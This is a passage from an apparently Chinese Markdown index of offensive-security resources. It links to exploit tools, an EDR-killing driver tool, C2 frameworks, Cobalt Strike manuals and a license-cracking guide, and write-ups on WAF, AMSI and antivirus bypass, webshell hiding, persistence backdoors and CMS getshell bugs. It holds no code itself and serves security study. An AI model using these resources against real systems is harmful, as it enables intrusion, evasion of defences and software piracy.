- [yongyou-nc-rce: 用友nc-反序列化漏洞验证加利用](https://github.com/superneilcn/yongyou-nc-rce)
- [YonyouNc-UNSERIALIZE-scan: 用友NC 反序列化检查工具,批量检测用友NC 反序列化](https://github.com/hkxueqi/YonyouNc-UNSERIALIZE-scan)
- [Proxy-Attackchain: proxylogon & proxyshell & proxyoracle & proxytoken & all exchange server vulns summarization](https://github.com/FDlucifer/Proxy-Attackchain)
- [Three-EyedRaven: 内网探测工具](https://github.com/zha0gongz1/Three-EyedRaven)
- [glider: glider是一个支持多协议的前向代理,也是一个具有ipset管理功能(如dnsmasq)的dns/dhcp服务器。](https://github.com/nadoo/glider)|[glider_guid41asd4asd: 使用Glider将节点转换成爬虫代理池](https://github.com/Rain-kl/glider_guid41asd4asd)
- [Terminator: 通过滥用zam64.sys驱动程序来终止所有EDR / XDR / AV进程](https://github.com/ZeroMemoryEx/Terminator)
- [router-router: 白盒代码审计-Java web路由内存分析工具](https://github.com/kyo-w/router-router)
- [jar-analyzer-cli: 一个用于分析Jar包的CLI工具](https://github.com/4ra1n/jar-analyzer-cli)|[jar-analyzer-gui](https://github.com/4ra1n/jar-analyzer-gui)
- [kindling: 基于eBPF的云本地监控工具](https://github.com/KindlingProject/kindling)
- [Havoc: Havoc是一款现代化的、可扩展的后渗透命令控制框架C2](https://github.com/HavocFramework/Havoc)
- [go-file: 基于 Go 的文件分享工具,仅单可执行文件,开箱即用](https://github.com/songquanpeng/go-file)
- [ehr_SafeCodeEncode_tamper:宏景ehr sql注入的tamper脚本](https://github.com/jdr2021/ehr_SafeCodeEncode_tamper)
## <span id="head8"> 文章/书籍/教程相关</span>
- [windwos权限维持系列12篇PDF](./books/Window权限维持)
- [Linux 权限维持之进程注入(需要关闭ptrace)](./books/Linux%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E4%B9%8B%E8%BF%9B%E7%A8%8B%E6%B3%A8%E5%85%A5%20%C2%AB%20%E5%80%BE%E6%97%8B%E7%9A%84%E5%8D%9A%E5%AE%A2.pdf) | [在不使用ptrace的情况下,将共享库(即任意代码)注入实时Linux进程中。(不需要关闭ptrace)](https://github.com/DavidBuchanan314/dlinject)|[[总结]Linux权限维持](./books/[总结]Linux权限维持.pdf)-[原文地址](https://www.cnblogs.com/-mo-/p/12337766.html)
- [44139-mysql-udf-exploitation](./books/44139-mysql-udf-exploitation.pdf)
- [emlog CMS的代码审计_越权到后台getshell](./books/emlog%20CMS的代码审计_越权到后台getshell%20-%20先知社区.pdf)
- [PHPOK 5.3 最新版前台注入](./books/PHPOK%205.3%20最新版前台注入%20-%20先知社区.pdf)
- [PHPOK 5.3 最新版前台无限制注入(二)](./books/PHPOK%205.3%20最新版前台无限制注入(二)%20-%20先知社区.pdf)
- [Thinkphp5 RCE总结](./books/Thinkphp5%20RCE总结%20_%20ChaBug安全.pdf)
- [rConfig v3.9.2 RCE漏洞分析](./books/rConfig%20v3.9.2%20RCE漏洞分析.pdf)
- [weiphp5.0 cms审计之exp表达式注入](./books/weiphp5.0%20cms审计之exp表达式注入%20-%20先知社区.pdf)
- [zzzphp1.7.4&1.7.5到处都是sql注入](./books/zzzphp1.7.4%261.7.5到处都是sql注入.pdf)
- [FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor](./books/FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor.pdf)
- [zzcms 2019 版本代码审计](./books/zzcms%202019%E7%89%88%E6%9C%AC%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%20-%20%E5%85%88%E7%9F%A5%E7%A4%BE%E5%8C%BA.pdf)
- [利用SQLmap 结合 OOB 技术实现音速盲注](./books/手把手带你利用SQLmap结合OOB技术实现音速盲注.pdf)
- [特权提升技术总结之Windows文件服务内核篇(主要是在webshell命令行执行各种命令搜集信息)](https://xz.aliyun.com/t/7261)|[(项目留存PDF版本)](./books/特权提升技术总结之Windows文件服务内核篇%20-%20先知社区.pdf)
- [WellCMS 2.0 Beta3 后台任意文件上传](./books/WellCMS%202.0%20Beta3%20后台任意文件上传.pdf)
- [国外详细的CTF分析总结文章(2014-2017年)](https://github.com/ctfs)
- [这是一篇“不一样”的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码](./books/这是一篇"不一样"的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码-%20奇安信A-TEAM技术博客.pdf)|[原文地址](https://blog.ateam.qianxin.com/post/zhe-shi-yi-pian-bu-yi-yang-de-zhen-shi-shen-tou-ce-shi-an-li-fen-xi-wen-zhang/)
- [表达式注入.pdf](./books/表达式注入.pdf)
- [WordPress ThemeREX Addons 插件安全漏洞深度分析](./books/WordPress%20ThemeREX%20Addons%20插件安全漏洞深度分析.pdf)
- [通达OA文件包含&文件上传漏洞分析](./books/通达OA文件包含&文件上传漏洞分析.pdf)
- [高级SQL注入:混淆和绕过](./books/高级SQL注入:混淆和绕过.pdf)
- [权限维持及后门持久化技巧总结](./books/权限维持及后门持久化技巧总结.pdf)
- [Windows常见的持久化后门汇总](./books/Windows常见的持久化后门汇总.pdf)
- [Linux常见的持久化后门汇总](./books/Linux常见的持久化后门汇总.pdf)
- [CobaltStrike4.0用户手册_中文翻译_3](./books/CobaltStrike4.0用户手册_中文翻译_3.pdf)
- [Cobaltstrike 4.0之 我自己给我自己颁发license.pdf](./books/Cobaltstrike%204破解之%20我自己给我自己颁发license.pdf)
- [Cobalt Strike 4.0 更新内容介绍](./books/Cobalt%20Strike%204.0%20更新内容介绍.pdf)
- [Cobalt-Strike-Start:可能是最详细的 Cobalt Strike 中文 Wiki](https://github.com/XXC385/Cobalt-Strike-Start)
- [Cobal_Strike_自定义OneLiner](./books/Cobal_Strike_自定义OneLiner_Evi1cg's_blog.pdf)
- [cobalt strike 快速上手 [ 一 ]](./books/cobalt_strike_快速上手%5B%20一%20%5D.pdf)
- [Cobalt strike3.0使用手册](./books/Cobalt_strike3.0使用手册.pdf)
- [Awesome-CobaltStrike-cobaltstrike的相关资源汇总](https://github.com/zer0yu/Awesome-CobaltStrike)
- [Cobalt_Strike_Spear_Phish_Cobalt Strike邮件钓鱼制作](./books/Cobalt_Strike_Spear_Phish_Evi1cg's%20blog%20%20CS邮件钓鱼制作.md)
- [Remote NTLM relaying through Cobalt Strike](./books/Remote_NTLM_relaying_through_CS.pdf)
- [渗透测试神器Cobalt Strike使用教程](./books/渗透测试神器Cobalt%20Strike使用教程.pdf)
- [Cobalt Strike的teamserver在Windows上快速启动脚本](./books/CS_teamserver_win.md)
- [ThinkPHP v6.0.0_6.0.1 任意文件操作漏洞分析](./books/ThinkPHP%20v6.0.0_6.0.1%20任意文件操作漏洞分析.pdf)
- [Django_CVE-2020-9402_Geo_SQL注入分析](./books/Django_CVE-2020-9402_Geo_SQL注入分析.pdf)
- [CVE-2020-10189_Zoho_ManageEngine_Desktop_Central_10反序列化远程代码执行](./books/CVE-2020-10189_Zoho_ManageEngine_Desktop_Central_10反序列化远程代码执行.pdf)
- [安全狗SQL注入WAF绕过](./books/安全狗SQL注入WAF绕过.pdf)
- [通过将JavaScript隐藏在PNG图片中,绕过CSP](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
- [通达OA任意文件上传_文件包含GetShell](./books/通达OA任意文件上传_文件包含GetShell.pdf)
- [文件上传Bypass安全狗4.0](./books/文件上传Bypass安全狗4.0.pdf)
- [SQL注入Bypass安全狗4.0](./books/SQL注入Bypass安全狗4.0.pdf)
- [通过正则类SQL注入防御的绕过技巧](./books/通过正则类SQL注入防御的绕过技巧.pdf)
- [MYSQL_SQL_BYPASS_WIKI-mysql注入,bypass的一些心得](https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI)
- [bypass云锁注入测试](./books/bypass云锁注入测试.md)
- [360webscan.php_bypass](./books/360webscan.php_bypass.pdf)
- [think3.2.3_sql注入分析](./books/think3.2.3_sql注入分析.pdf)
- [UEditor SSRF DNS Rebinding](./books/UEditor%20SSRF%20DNS%20Rebinding)
- [PHP代码审计分段讲解](https://github.com/bowu678/php_bugs)
- [京东SRC小课堂系列文章](https://github.com/xiangpasama/JDSRC-Small-Classroom)
- [windows权限提升的多种方式](https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842)|[Privilege_Escalation_in_Windows_for_OSCP](./books/Privilege_Escalation_in_Windows_for_OSCP.pdf)
- [bypass CSP](https://medium.com/bugbountywriteup/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)|[Content-Security-Policy(CSP)Bypass_Techniques](./books/Content-Security-Policy(CSP)Bypass_Techniques.pdf)
- [个人维护的安全知识框架,内容偏向于web](https://github.com/No-Github/1earn)
- [PAM劫持SSH密码](./PAM劫持SSH密码.md)
- [零组资料文库-(需要邀请注册)](https://wiki.0-sec.org/)
- [redis未授权个人总结-Mature](./books/redis未授权个人总结-Mature.pdf)
- [NTLM中继攻击的新方法](https://www.secureauth.com/blog/what-old-new-again-relay-attack)
- [PbootCMS审计](./books/PbootCMS审计.pdf)
- [PbootCMS 3.0.4 SQL注入漏洞复现](./books/PbootCMS%203.0.4%20SQL注入漏洞复现.pdf)
- [De1CTF2020系列文章](https://github.com/De1ta-team/De1CTF2020)
- [xss-demo-超级简单版本的XSS练习demo](https://github.com/haozi/xss-demo)
- [空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透](./books/空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透.pdf)
- [入门KKCMS代码审计](./books/入门KKCMS代码审计.pdf)
- [SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 checklist](https://github.com/LandGrey/SpringBootVulExploit)
- [文件上传突破waf总结](./books/文件上传突破waf总结.pdf)
- [极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞](./books/极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf)|[原文地址](https://xz.aliyun.com/t/7872)
- [代码审计之DTCMS_V5.0后台漏洞两枚](./books/代码审计之DTCMS_V5.0后台漏洞两枚.pdf)
- [快速判断sql注入点是否支持load_file](./快速判断sql注入点是否支持load_file.md)
- [文件上传内容检测绕过](./books/文件上传内容检测绕过.md)
- [Fastjson_=1.2.47反序列化远程代码执行漏洞复现](./books/Fastjson_=1.2.47反序列化远程代码执行漏洞复现.pdf)
- [【Android脱壳】_腾讯加固动态脱壳(上篇)](./books/移动安全(九)_TengXun加固动态脱壳(上篇).pdf)
- [【Android脱壳】腾讯加固动态脱壳(下篇)](./books/移动安全(十)_TengXun加固动态脱壳(下篇).pdf)
- [【Android脱壳】记一次frida实战——对某视频APP的脱壳、hook破解、模拟抓包、协议分析一条龙服务](./books/记一次frida实战——对某视频APP的脱壳、hook破解、模拟抓包、协议分析一条龙服务.pdf)
- [【Android脱壳】-免root脱腾讯御安全加固](./books/免root脱腾讯御安全加固.pdf)
- [【Android抓包】记一次APP测试的爬坑经历.pdf](./books/记一次APP测试的爬坑经历.pdf)
- [完整的内网域渗透-暗月培训之项目六](./books/完整的内网域渗透-暗月培训之项目六.pdf)
- [Android APP渗透测试方法大全](./books/Android%20APP渗透测试方法大全.pdf)
- [App安全检测指南-V1.0](./books/App安全检测指南-V1.0.pdf)
- [借github上韩国师傅的一个源码实例再次理解.htaccess的功效](./books/借github上韩国师傅的一个源码实例再次理解.htaccess的功效.pdf)
- [Pentest_Note-渗透Tips,总结了渗透测试常用的工具方法](https://github.com/xiaoy-sec/Pentest_Note)
- [红蓝对抗之Windows内网渗透-腾讯SRC出品](./books/红蓝对抗之Windows内网渗透-腾讯SRC出品.pdf)
- [远程提取Windows中的系统凭证](./books/远程提取Windows中的系统凭证.pdf)
- [绕过AMSI执行powershell脚本](./books/绕过AMSI执行powershell脚本.md)|[AmsiScanBufferBypass-相关项目](https://github.com/rasta-mouse/AmsiScanBufferBypass)
- [踩坑记录-Redis(Windows)的getshell](./books/踩坑记录-Redis(Windows)的getshell.pdf)
- [Cobal_Strike踩坑记录-DNS Beacon](./books/Cobal_Strike踩坑记录-DNS%20Beacon.pdf)
- [windows下隐藏webshell的方法](./books/windows下隐藏webshell的方法.md)
- [DEDECMS伪随机漏洞分析 (三) 碰撞点(爆破,伪造管理员cookie登陆后台getshell](./books/DEDECMS伪随机漏洞分析(三)碰撞点.pdf)
- [针对宝塔的RASP及其disable_functions的绕过](./books/针对宝塔的RASP及其disable_functions的绕过.pdf)
- [渗透基础WMI学习笔记](./books/渗透基础WMI学习笔记.pdf)
- [【海洋CMS】SeaCMS_v10.1代码审计实战](./books/SeaCMS_v10.1代码审计实战.pdf)
- [红队攻防实践:闲谈Webshell在实战中的应用](./books/红队攻防实践:闲谈Webshell在实战中的应用.pdf)
- [红队攻防实践:unicode进行webshell免杀的思考](./books/红队攻防实践:unicode进行webshell免杀的思考.pdf)
- [php无eval后门](./books/php无eval后门.pdf)
- [【代码审计】ThinkPhp6任意文件写入](./books/[代码审计]ThinkPhp6任意文件写入.pdf)
- [YzmCMS代码审计](./books/YzmCMS代码审计.pdf)
- [BadUSB简单免杀一秒上线CobaltStrike](./books/BadUSB/BadUSB简单免杀一秒上线CobaltStrike.pdf)
- [BasUSB实现后台静默执行上线CobaltStrike](./books/BadUSB/BadUSB实现后台静默执行上线CobaltStrike.pdf)
- [手把手带你制作一个X谁谁上线的BadUSB](./books/BadUSB/手把手带你制作一个X谁谁上线的BadUSB.pdf)|[近源渗透-BadUsb](./books/近源渗透-BadUsb.pdf)-[原文地址](https://mp.weixin.qq.com/s/3tX6uxqw0_tjhQK0ARec5A)
- [一文学会Web_Service漏洞挖掘](./books/一文学会Web_Service漏洞挖掘.pdf)
- [唯快不破的分块传输绕WAF](./books/唯快不破的分块传输绕WAF.pdf)
- [Unicode的规范化相关漏洞挖掘思路实操](./books/Unicode的规范化相关漏洞挖掘思路实操.pdf)
- [换一种姿势挖掘任意用户密码重置漏洞-利用不规范化的Unicode编码加burp挖掘](./books/换一种姿势挖掘任意用户密码重置漏洞-利用Unicode域名加burp挖掘.pdf)
- [全方面绕过安全狗2](./books/全方面绕过安全狗2.pdf)
- [冰蝎——从入门到魔改](./books/冰蝎——从入门到魔改.pdf)
- [冰蝎——从入门到魔改(续)](./books/冰蝎——从入门到魔改(续).pdf)
- [技术分享_ 内网渗透手动学习实践](./books/技术分享%20_%20内网渗透手动学习实践.pdf)
- [权限维持之打造不一样的映像劫持后门](./books/权限维持之打造不一样的映像劫持后门.pdf)
- [Jboss漏洞利用总结](./books/Jboss漏洞利用总结.pdf)
- [Java RMI服务远程命令执行利用](./books/Java_RMI服务远程命令执行利用.pdf)|[小天之天的测试工具-attackRMI.jar](./tools/attackRMI.jar)
- [PbootCMS任意代码执行(从v1.0.1到v2.0.9)的前世今生](./books/PbootCMS任意代码执行(从v1.0.1到v2.0.9)的前世今生.pdf)
- [实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据](./books/实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据.pdf)
- [OneThink前台注入分析](./books/OneThink前台注入分析.pdf)
- [记一次从源代码泄漏到后台(微擎cms)获取webshell的过程](./books/记一次从源代码泄漏到后台(微擎cms)获取webshell的过程.pdf)-[源出](https://fuping.site/2020/04/18/WeiQing-CMS-Background-Admin-GetShell/)
- [Android抓包—关于抓包的碎碎念-看雪论坛-Android板块ChenSem](./books/关于抓包的碎碎念.pdf)|[原文地址](https://bbs.pediy.com/thread-260965.htm)
- [CVE-2020-15778-Openssh-SCP命令注入漏洞复现报告](./books/CVE-2020-15778-Openssh-SCP命令注入漏洞复现报告.pdf)
- [bolt_cms_V3.7.0_xss和远程代码执行漏洞](./books/bolt_cms_V3.7.0_xss和远程代码执行漏洞.pdf)
- [关于Cobalt_Strike检测方法与去特征的思考](./books/关于Cobalt_Strike检测方法与去特征的思考.pdf)
- [代码审计_PHPCMS_V9前台RCE挖掘分析](./books/代码审计_PHPCMS_V9前台RCE挖掘分析.pdf)
- [PHPCMS_V9.2任意文件上传getshell漏洞分析](./books/PHPCMS_V9.2任意文件上传getshell漏洞分析.pdf)-[原文地址](https://mp.weixin.qq.com/s/o_u_mFjFIq3hKgSvVFGcRg)
- [【免杀】C++免杀项目推荐](./books/C++免杀项目推荐.pdf)-[附件下载](./tools/RefacterC.zip)|[原文地址](https://mp.weixin.qq.com/s/0OB0yQAiOfsU4JqkCDUi7w)
- [利用图片隐写术来远程动态加载shellcode](./books/利用图片隐写术来远程动态加载shellcode.pdf)|[原文地址](https://mp.weixin.qq.com/s/QZ5YlRZN47zne7vCzvUpJw)
- [[后渗透]Mimikatz使用大全](./books/[后渗透]Mimikatz使用大全.pdf)|[原文地址](https://www.cnblogs.com/-mo-/p/11890232.html)
- [渗透测试XiaoCms之自力更生代码审计-后台数据库备份SQL注入到getshell](./books/渗透测试XiaoCms之自力更生代码审计-后台数据库备份SQL注入到getshell.pdf)|[原文地址](https://mp.weixin.qq.com/s/K2nUSMyE4PwVYqa7t95BTQ)
- [HW礼盒:深信服edr RCE,天融信dlp unauth和通达OA v11.6版本RCE](./books/HW%E7%A4%BC%E7%9B%92%EF%BC%9A%E6%B7%B1%E4%BF%A1%E6%9C%8Dedr%20RCE%EF%BC%8C%E5%A4%A9%E8%9E%8D%E4%BF%A1dlp%20unauth%E5%92%8C%E9%80%9A%E8%BE%BEOA%20v11.6%E7%89%88%E6%9C%ACRCE.pdf)
- [[0day]通达 OA v11.7 后台 SQL 注入到 RCE](./books/[0day]通达%20OA%20v11.7%20后台%20SQL%20注入到%20RCE.pdf)-[原文地址](https://mp.weixin.qq.com/s/rtX9mJkPHd9njvM_PIrK_Q)
- [wordpress 评论插件 wpDiscuz 任意文件上传漏洞分析](./books/wordpress%20%E8%AF%84%E8%AE%BA%E6%8F%92%E4%BB%B6%20wpDiscuz%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.pdf)
- [Gopher协议使用总结](./books/Gopher协议使用总结.pdf)-[原文地址](https://mp.weixin.qq.com/s/SjGvsl3jxOtyg6BtGgFf5A)
- [sqlmap使用总结](./books/sqlmap使用总结.pdf)|[【实战技巧】sqlmap不为人知的骚操作](./books/%E3%80%90%E5%AE%9E%E6%88%98%E6%8A%80%E5%B7%A7%E3%80%91sqlmap%E4%B8%8D%E4%B8%BA%E4%BA%BA%E7%9F%A5%E7%9A%84%E9%AA%9A%E6%93%8D%E4%BD%9C_Summer's_blog.pdf)-[原文地址](https://blog.csdn.net/sun1318578251/article/details/102524100)|[记一份SQLmap 使用手册小结(一)](./books/记一份SQLmap%20使用手册小结(一).pdf)|[记一份SQLmap 使用手册小结(二)](./books/记一份SQLmap%20使用手册小结(二).pdf)
- [mac上Parallels Desktop安装kali linux 2020.2a并安装好Parallels Tools+Google拼音输入法](./books/mac%E4%B8%8AParallels%20Desktop%E5%AE%89%E8%A3%85kali%20linux%202020.2a%E5%B9%B6%E5%AE%89%E8%A3%85%E5%A5%BDParallels%20Tools+Google%E6%8B%BC%E9%9F%B3%E8%BE%93%E5%85%A5%E6%B3%95.docx)
- [通达OA v11.5 多枚0day漏洞复现](./books/%E9%80%9A%E8%BE%BEOA%20v11.5%20%E5%A4%9A%E6%9E%9A0day%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0.pdf)|[续集 _ 再发通达OA多枚0day](./books/%E7%BB%AD%E9%9B%86%20_%20%E5%86%8D%E5%8F%91%E9%80%9A%E8%BE%BEOA%E5%A4%9A%E6%9E%9A0day.pdf)-[原文地址](https://mp.weixin.qq.com/s/RlOpohHvjHv_Qg3mNgDCAQ)
- [POSCMS(20200821)_任意 SQL 语句执行(需要登录后台)](./books/POSCMS_%E4%BB%BB%E6%84%8F%20SQL%20%E8%AF%AD%E5%8F%A5%E6%89%A7%E8%A1%8C%EF%BC%88%E9%9C%80%E8%A6%81%E7%99%BB%E5%BD%95%E5%90%8E%E5%8F%B0%EF%BC%89.pdf)-[原文地址](https://www.t00ls.net/thread-57551-1-1.html)|[POSCMS v3.2.0漏洞复现(getshell+前台SQL注入)](./books/POSCMS%20v3.2.0%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0(getshell+%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5).pdf)-[原文地址](https://xz.aliyun.com/t/4858)
- [多线程+二分法的巧用——通达OA 2017 SQL盲注](./books/%E5%A4%9A%E7%BA%BF%E7%A8%8B+%E4%BA%8C%E5%88%86%E6%B3%95%E7%9A%84%E5%B7%A7%E7%94%A8%E2%80%94%E2%80%94%E9%80%9A%E8%BE%BEOA%20SQL%E7%9B%B2%E6%B3%A8.pdf)-[原文地址](https://mp.weixin.qq.com/s/zH13q6xBRc58ggHqfKKi_g)
- [宝塔面板webshell隐藏小技巧](./books/宝塔面板webshell隐藏小技巧.pdf)-[原文地址](https://mp.weixin.qq.com/s/-8JE1ovWKOorNr6MCAgejg)
- [配合隐写术远程动态加载 shellcode](./books/%E9%85%8D%E5%90%88%E9%9A%90%E5%86%99%E6%9C%AF%E8%BF%9C%E7%A8%8B%E5%8A%A8%E6%80%81%E5%8A%A0%E8%BD%BD%20shellcode.pdf)|[原文地址](https://www.t00ls.net/thread-57618-1-1.html)
- [MySQL蜜罐获取攻击者微信ID](./books/MySQL蜜罐获取攻击者微信ID.pdf)-[原文地址](https://mp.weixin.qq.com/s/m4I_YDn98K_A2yGAhv67Gg)
- [蓝天采集器 v2.3.1 后台getshell(需要管理员权限)](./books/蓝天采集器%20v2.3.1%20后台getshell(需要管理员权限).pdf)
- [实战-从社工客服拿到密码登录后台加SQL注入绕过安全狗写入webshell到提权进内网漫游](./books/实战-从社工客服拿到密码登录后台加SQL注入绕过安全狗写入webshell到提权进内网漫游.pdf)-[原文地址](https://mp.weixin.qq.com/s/JBspfEHTDZBiOXEyI14QKQ)
- [0day安全_软件漏洞分析技术(第二版)](https://cloud.189.cn/t/7ziI3imqMzI3)
- [安恒信息《渗透攻击红队百科全书》](https://cloud.189.cn/t/Jzeuuq3YFr2e)
- [lcx端口转发(详解)](./books/lcx端口转发(详解).pdf)
- [php_bugs-PHP代码审计分段讲解](https://github.com/bowu678/php_bugs)
- [深信服edr终端检测响应平台(<3.2.21)代码审计挖掘(RCE)](./books/深信服edr终端检测响应平台(<3.2.21)代码审计挖掘(RCE).pdf)-[原文地址](https://mp.weixin.qq.com/s/3TC7TRAFceBWgj_ANA2etQ)
- [深信服edr终端检测响应平台(<3.2.21)代码审计挖掘(权限绕过)](./books/深信服edr终端检测响应平台(<3.2.21)代码审计挖掘(权限绕过).pdf)-[原文地址](https://mp.weixin.qq.com/s/4Z4QF-Wdq2PhqCkGKB8Q6Q)
- [Hook梦幻旅途之Frida](./books/Hook梦幻旅途之Frida.pdf)
- [简单的源码免杀过av](./books/简单的源码免杀过av.pdf)
- [duomicms代码审计](./books/duomicms代码审计.pdf)
- [劫持got表绕过disable_functions](./books/劫持got表绕过disable_functions.pdf)-[原文地址](https://mp.weixin.qq.com/s/NDkDc7j5rFbcHWTM26zeGQ)
- [【代码审计】xyhcms3.5后台任意文件读取](./books/[代码审计]xyhcms3.5后台任意文件读取.pdf)-[原文地址](https://mp.weixin.qq.com/s/hQq7Owew2V_MyCJLKHnR4g)
- [CVE-2020-1472 域内提权完整利用](./books/CVE-2020-1472%20域内提权完整利用.pdf)-[原文地址](https://mp.weixin.qq.com/s/RUkGMxM5GjFrEiKa8aH6JA)
- [CVE-2020-15148 Yii框架反序列化RCE利用链 exp](./books/CVE-2020-15148%20Yii框架反序列化RCE利用链%20exp.pdf)
- [Yii框架反序列化RCE利用链分析](./books/Yii框架反序列化RCE利用链分析.pdf)-[原文链接](https://mp.weixin.qq.com/s/KNhKti5Kcl-She4pU3D-5g)|[Yii 框架反序列化 RCE 利用链 2(官方无补丁)](./books/Yii%20框架反序列化%20RCE%20利用链%202(官方无补丁).pdf)-[原文链接](https://mp.weixin.qq.com/s/h-mbaw3vfHwx2SAZhiDe5Q)|[怎样挖掘出属于自己的 php 反序列化链](./books/怎样挖掘出属于自己的%20php%20反序列化链.pdf)-[原文链接](https://xz.aliyun.com/t/8082)
- [Apache 的. htaccess 利用技巧](./books/Apache%20的.%20htaccess%20利用技巧.pdf)
- [fastadmin(V1.0.0.20200506_beta) 前台 getshell(文件上传解析) 漏洞分析](./books/fastadmin(V1.0.0.20200506_beta)%20前台%20getshell(文件上传解析)%20漏洞分析.pdf)
- [HW2020-0day总结](./books/HW2020-0day总结.pdf)
- [Ecshop 4.0 SQL(代码审计从Nday到0day )](Ecshop%204.0%20SQL(代码审计从Nday到0day%20).pdf)
- [Yii2框架Gii模块 RCE 分析](./books/Yii2框架Gii模块%20RCE%20分析.pdf)
- [Windows操作系统基线核查](./books/Windows操作系统基线核查.pdf)
- [phpmyadmin getshell的五种方式](./books/phpmyadmin%20getshell的五种方式.pdf)
- [Adminer≤4.6.2任意文件读取漏洞](./books/Adminer≤4.6.2任意文件读取漏洞.pdf)-[原文地址](https://mp.weixin.qq.com/s/ZYGN8WceT2L-P4yF6Z8gyQ)
- [Ueditor最新版XML文件上传导致存储型XSS](./books/Ueditor最新版XML文件上传导致存储型XSS.pdf)
- [Nette框架远程代码执行(CVE-2020-15227)-七月火mochazz师傅分析](./books/Nette框架远程代码执行(CVE-2020-15227).md)
- [红队技巧:隐藏windows服务](./books/红队技巧:隐藏windows服务.pdf)
- [蓝队技巧:查找被隐藏的Windows服务项](./books/蓝队技巧:查找被隐藏的Windows服务项.pdf)
- [VHAdmin虚拟主机提权实战案例](./books/VHAdmin虚拟主机提权实战案例.pdf)-[原文地址](https://mp.weixin.qq.com/s/LmXi6niSJ4s-Cmq3jWSjaQ)
- [移动安全-APP渗透进阶之AppCan本地文件解密](./books/移动安全-APP渗透进阶之AppCan本地文件解密.pdf)-[原文地址](https://mp.weixin.qq.com/s/ybaiTkHetbbbshH1KZXRaQ)
- [【建议收藏】Cobalt Strike学习笔记合集](./books/【建议收藏】CS学习笔记合集%20_%20Teams%20Six.pdf)
- [Cobalt_Strike_wiki-Cobalt Strike系列](https://github.com/aleenzz/Cobalt_Strike_wiki)
- [Cobalt Strike在线手册](https://wbglil.gitbook.io/cobalt-strike/)
- [Cobalt Strike 4.2 Manual(cs 4.2英文手册)](./books/Cobalt%20Strike%204.2%20Manual.pdf)
- [域渗透之NTML-Hash总结](./books/域渗透之NTML-Hash总结.pdf)-[原文地址](https://ssooking.github.io/yu-shen-tou-zhi-ntml-hash/)
- [SQLite手工注入Getshell技巧](./books/SQLite手工注入Getshell技巧.pdf)-[原文地址](https://fuping.site/2017/07/19/SQLite-Injection-Get-WebShell/)
- [CVE-2020-1472 NetLogon 特权提升漏洞环境+详细复现步骤](./books/CVE-2020-1472%20NetLogon%20特权提升漏洞.pdf)-[原文地址](https://www.svenbeast.com/post/fu-xian-cve-2020-1472-netlogon-te-quan-ti-sheng-lou-dong/)
- [猪哥的读书笔记-主要包括内网安全攻防-渗透测试指南&专注 APT 攻击与防御 - Micro8](https://github.com/zhutougg/book_notes)
- [高版本AES-GCM模式加密的Shiro漏洞利用](./books/高版本AES-GCM模式加密的Shiro漏洞利用.pdf)-[原文地址](https://mp.weixin.qq.com/s/otschvw7rJkNH-HsbKkqBA)
- [[CVE-2020-14882_14883]WebLogioc console认证绕过+任意代码执行](./books/%5BCVE-2020-14882_14883%5DWebLogioc%20console认证绕过%2B任意代码执行.pdf)-[原文地址](https://mp.weixin.qq.com/s/u8cZEcku-uIbGAVAcos5Tw)
- [JNDI注入学习](./books/JNDI注入学习.pdf)-[原文地址](https://www.redteaming.top/2020/08/24/JNDI-Injection/)
- [绕过CDN查找真实IP方法总结](./books/绕过CDN查找真实IP方法总结.pdf)-[原文地址](https://mp.weixin.qq.com/s/aSD6kTTOdVgoZXJuqTSqDQ)
- [真实IP探测方法大全](./books/绕cdn探测真实ip方法大全.pdf)-[原文地址](https://blog.csdn.net/qq_38265674/article/details/110954257)
- [SQL注入简单总结——过滤逗号注入(附绕过tamper)](./books/SQL注入简单总结——过滤逗号注入.pdf)-[原地址](https://www.jianshu.com/p/d10785d22db2)
- [绕过WAF的另类webshell木马文件测试方法](./books/绕过WAF的另类webshell木马文件测试方法.pdf)-[源出](https://www.freebuf.com/articles/network/253803.html)
- [Android 渗透测试 frida——Brida 插件加解密实战演示](./books/Android%20渗透测试%20frida——Brida%20插件加解密实战演示.pdf)-[源处](https://xz.aliyun.com/t/7562)
- [一个由个人维护的安全知识框架,内容包括不仅限于 web安全、工控安全、取证、应急、蓝队设施部署、后渗透、Linux安全、各类靶机writup](https://github.com/No-Github/1earn)-[在线版](https://ffffffff0x.gitbook.io/1earn/)
- [AndroidSecurityStudy-安卓应用安全学习(主要包括Frida&&FART系列)](https://github.com/r0ysue/AndroidSecurityStudy)
- [Mysql注入总结](./books/Mysql注入总结.pdf)-[原文地址](https://mp.weixin.qq.com/s/09VLJjbhKmLZhJdQnvtIvQ)
- [ThinkAdmin未授权列目录_任意文件读取(CVE-2020-25540)漏洞复现](./books/ThinkAdmin未授权列目录_任意文件读取(CVE-2020-25540)漏洞复现.pdf)-[原文地址](https://mp.weixin.qq.com/s/ORM_6AXz-4jpg1wn82GrLg)
- [【免杀技巧】利用加载器以及Python反序列化绕过AV-打造自动化免杀平台](./books/利用加载器以及Python反序列化绕过AV-打造自动化免杀平台.pdf)-[原文地址](https://mp.weixin.qq.com/s/sd73eL3-TnMm0zWLCC8cOQ)
